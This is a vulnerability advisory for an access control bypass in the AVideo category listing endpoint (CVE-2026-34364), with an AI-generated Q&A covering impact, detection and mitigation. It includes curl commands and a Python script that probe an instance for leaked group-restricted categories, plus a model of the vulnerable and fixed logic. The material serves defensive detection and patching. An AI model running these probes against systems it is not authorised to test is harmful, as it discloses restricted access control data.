CVE-2026-34364
Access Control Bypass in WWBN AVideo categories.json.php Endpoint
Publication date: 2026-03-27
Last updated on: 2026-04-14
Assigner: GitHub, Inc.
Description
CVSS Scores
Base score 5.3 (Medium), as stated in the Q&A below; no vector string is given on this page.
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| wwbn | avideo | up to and including 26.0 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-863 | The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-34364 is a vulnerability in the WWBN AVideo open source video platform (versions up to and including 26.0) affecting the categories.json.php endpoint, which serves the category listing API.
The vulnerability arises because the endpoint does not enforce user group-based access control consistently. When no user parameter is supplied in the request, the user-group filter is skipped entirely, so every non-private category is returned, including those restricted to specific user groups.
When a user parameter is supplied, a type confusion bug causes the filter to use the admin user's group memberships instead of the requesting user's, so the filter passes categories the requester is not entitled to see.
In both cases unauthorized users see categories they should not have access to, including metadata describing which groups each category is restricted to.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability in WWBN AVideo allows unauthorized users to bypass user group-based access controls and enumerate restricted categories, exposing internal access control configurations. This information disclosure could potentially lead to unauthorized access to sensitive metadata about category restrictions.
While the CVE description and resources do not explicitly mention compliance with standards such as GDPR or HIPAA, the exposure of access control information and potential unauthorized data access could raise concerns under these regulations, which require protection of sensitive data and proper access controls.
Therefore, this vulnerability may negatively impact compliance with data protection regulations by failing to adequately restrict access to category metadata, which could be considered sensitive depending on the context of the data hosted on the platform.
How can this vulnerability impact me? :
This vulnerability allows any unauthenticated or unauthorized user to bypass intended access controls and enumerate all non-private categories, including those restricted to specific user groups.
As a result, sensitive information about category restrictions and internal access control configurations is disclosed.
This information disclosure can facilitate further targeted attacks or unauthorized access attempts on videos within those restricted categories.
The vulnerability has a medium severity rating with a CVSS score of 5.3, indicating a moderate risk primarily due to information disclosure rather than direct content compromise.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by querying the category listing API from an unauthenticated client (no session cookie) and checking whether categories you have restricted to user groups appear in the response.
Specifically, a request to `categories.json.php` without the `?user=` parameter must not return categories restricted to specific user groups. If it does, the instance is vulnerable.
Additionally, a request with `?user=<id>` from the same unauthenticated client should return only what that user's own groups permit; if categories restricted to groups that user does not belong to are listed, the filter is applying another user's (the admin's) memberships. Use the id of an account that belongs to no restricted group: if id 1 is the admin account, its result cannot distinguish correct filtering from the admin substitution.
- Use a command like: `curl -s 'http://<your-avideo-domain>/objects/categories.json.php'` and check whether the ids of your group-restricted categories appear in the output.
- Use a command like: `curl -s 'http://<your-avideo-domain>/objects/categories.json.php?user=<low-privilege-id>'` (the original example uses `?user=1`) and check whether categories outside that user's groups are listed.
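The two probes above, as an added example script that is not part of this advisory or of AVideo. It assumes the endpoint path `/objects/categories.json.php` used in the curl commands, and, because this page does not document the response shape, it assumes only that category objects somewhere in the JSON carry an integer `id`; tighten `extract_category_ids()` once you have seen a real response. The operator supplies the ids of categories known to be restricted to groups the probe client is not in, and the id of a low-privilege account.

```python
"""Probe an AVideo instance for the CVE-2026-34364 group-filter bypass.

Added example; not from the advisory and not AVideo code. Assumptions are
marked in comments. Run without cookies so the server sees an anonymous client.
"""
import json
import sys
import urllib.request


def extract_category_ids(doc):
    """Collect every integer 'id' found in any object of a JSON document.

    Assumption: category rows carry an 'id' key. The walk is deliberately
    schema-agnostic because the real response layout is not given on the page.
    """
    found = set()
    stack = [doc]
    while stack:
        node = stack.pop()
        if isinstance(node, dict):
            value = node.get("id")
            if isinstance(value, int) and not isinstance(value, bool):
                found.add(value)
            stack.extend(node.values())
        elif isinstance(node, list):
            stack.extend(node)
    return found


def exposed(doc, restricted_ids):
    """Restricted category ids that a listing response leaks, sorted."""
    return sorted(extract_category_ids(doc) & set(restricted_ids))


def fetch_json(url):
    """GET with no cookies, so the request is anonymous."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


def probe(base_url, restricted_ids, low_priv_user_id):
    """Run both probes; returns {probe name: [leaked restricted ids]}."""
    endpoint = base_url.rstrip("/") + "/objects/categories.json.php"
    probes = {
        "no user parameter": endpoint,
        # An account in no restricted group: if the filter substitutes the
        # admin's memberships, the admin-visible categories leak here.
        f"user={low_priv_user_id}": f"{endpoint}?user={low_priv_user_id}",
    }
    return {name: exposed(fetch_json(url), restricted_ids) for name, url in probes.items()}


# Constructed sample response for offline use; not a captured AVideo reply.
SAMPLE_RESPONSE = {
    "status": "ok",
    "rows": [
        {"id": 1, "name": "Public talks"},
        {"id": 5, "name": "Staff briefings"},
        {"id": 9, "name": "Board only"},
    ],
}


if __name__ == "__main__":
    # usage: probe.py https://avideo.example 5,9 3
    #   5,9 : ids of categories restricted to groups the probe client is not in
    #   3   : id of a low-privilege account
    base, id_list, uid = sys.argv[1], sys.argv[2], sys.argv[3]
    restricted = [int(i) for i in id_list.split(",")]
    for name, leaked in probe(base, restricted, int(uid)).items():
        print(f"{name}: {'VULNERABLE, leaks ' + str(leaked) if leaked else 'ok'}")
```

A leak from the first probe is the missing-filter path; a leak from the second, with an account that belongs to no restricted group, is the admin-substitution path. An empty result from both is evidence of a fixed instance only if the restricted ids you passed really are restricted to groups the probe client is not in.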
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to update the wwbn/AVideo platform to a version that includes the fix for CVE-2026-34364.
The fix involves modifying the category listing API to always apply user group filtering based on the actual logged-in user's ID, or a sentinel value for guests, preventing unauthorized access to restricted categories.
If updating immediately is not possible, restrict access to the `categories.json.php` endpoint to authenticated users only or implement network-level controls to limit access. Note that this only closes the unauthenticated path; the `?user=` parameter path still misfilters for authenticated users until the fix is applied.
- Apply the patch from commit 6e8a673eed07be5628d0b60fbfabd171f3ce74c9 which corrects the user group filtering logic.
- Ensure that the backend enforces user group membership checks consistently for all category retrieval functions.
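The fix described above (always filter, keyed on the server-side session identity, with a sentinel for guests) alongside the two failure modes the advisory describes, as an added illustration that is not AVideo code. The data model (a private flag, an optional set of allowed groups per category, a user-id to groups table, the `GUEST` sentinel, `ADMIN_ID`) is assumed for illustration, and the "admin's groups get used" branch stands in for the type confusion whose mechanism this page does not detail.

```python
"""Model of the category-visibility logic behind CVE-2026-34364.

Added example, not AVideo code: the data model and sentinel values are
assumed for illustration; sample categories and memberships are constructed.
"""
from dataclasses import dataclass

GUEST = 0      # assumed sentinel for anonymous sessions; never a real user id
ADMIN_ID = 1   # assumed id of the admin account


@dataclass(frozen=True)
class Category:
    id: int
    name: str
    private: bool = False              # private: never listed by this endpoint
    groups: frozenset = frozenset()    # empty: anyone; otherwise only these groups


# Constructed sample data.
CATEGORIES = [
    Category(1, "Public talks"),
    Category(2, "Staff briefings", groups=frozenset({"staff"})),
    Category(3, "Admin notes", groups=frozenset({"admins"})),
    Category(4, "Drafts", private=True),
]
MEMBERSHIPS = {1: {"admins", "staff"}, 2: {"staff"}, 3: set()}


def groups_of(user_id):
    return MEMBERSHIPS.get(user_id, set())


def can_see(category, groups):
    """Non-private and either unrestricted or sharing a group with the viewer."""
    return not category.private and (not category.groups or bool(category.groups & groups))


def list_categories_vulnerable(user_param):
    """Reproduces the two failure modes the advisory describes.

    `user_param` is the client-supplied ?user= value (None when absent).
    """
    listable = [c for c in CATEGORIES if not c.private]
    if user_param is None:
        return listable                          # failure 1: no group filter at all
    # failure 2: stands in for the type confusion; per the advisory the admin's
    # memberships are used instead of the requester's.
    admin_groups = groups_of(ADMIN_ID)
    return [c for c in listable if can_see(c, admin_groups)]


def list_categories_fixed(session_user_id):
    """Always filter, keyed on the server-side session identity.

    The client-supplied ?user= value is never consulted; anonymous sessions
    pass GUEST and therefore match no group.
    """
    groups = set() if session_user_id == GUEST else groups_of(session_user_id)
    return [c for c in CATEGORIES if can_see(c, groups)]


def ids(categories):
    return [c.id for c in categories]


if __name__ == "__main__":
    print("vulnerable, no user param:", ids(list_categories_vulnerable(None)))
    print("vulnerable, user=3:       ", ids(list_categories_vulnerable(3)))
    print("fixed, guest:             ", ids(list_categories_fixed(GUEST)))
    print("fixed, user 3:            ", ids(list_categories_fixed(3)))
```

The point of the fixed version is structural: the filter cannot be skipped because there is no branch without it, and the identity it filters on comes from the session rather than from a request parameter, so there is no client-controlled value for a type confusion to act on.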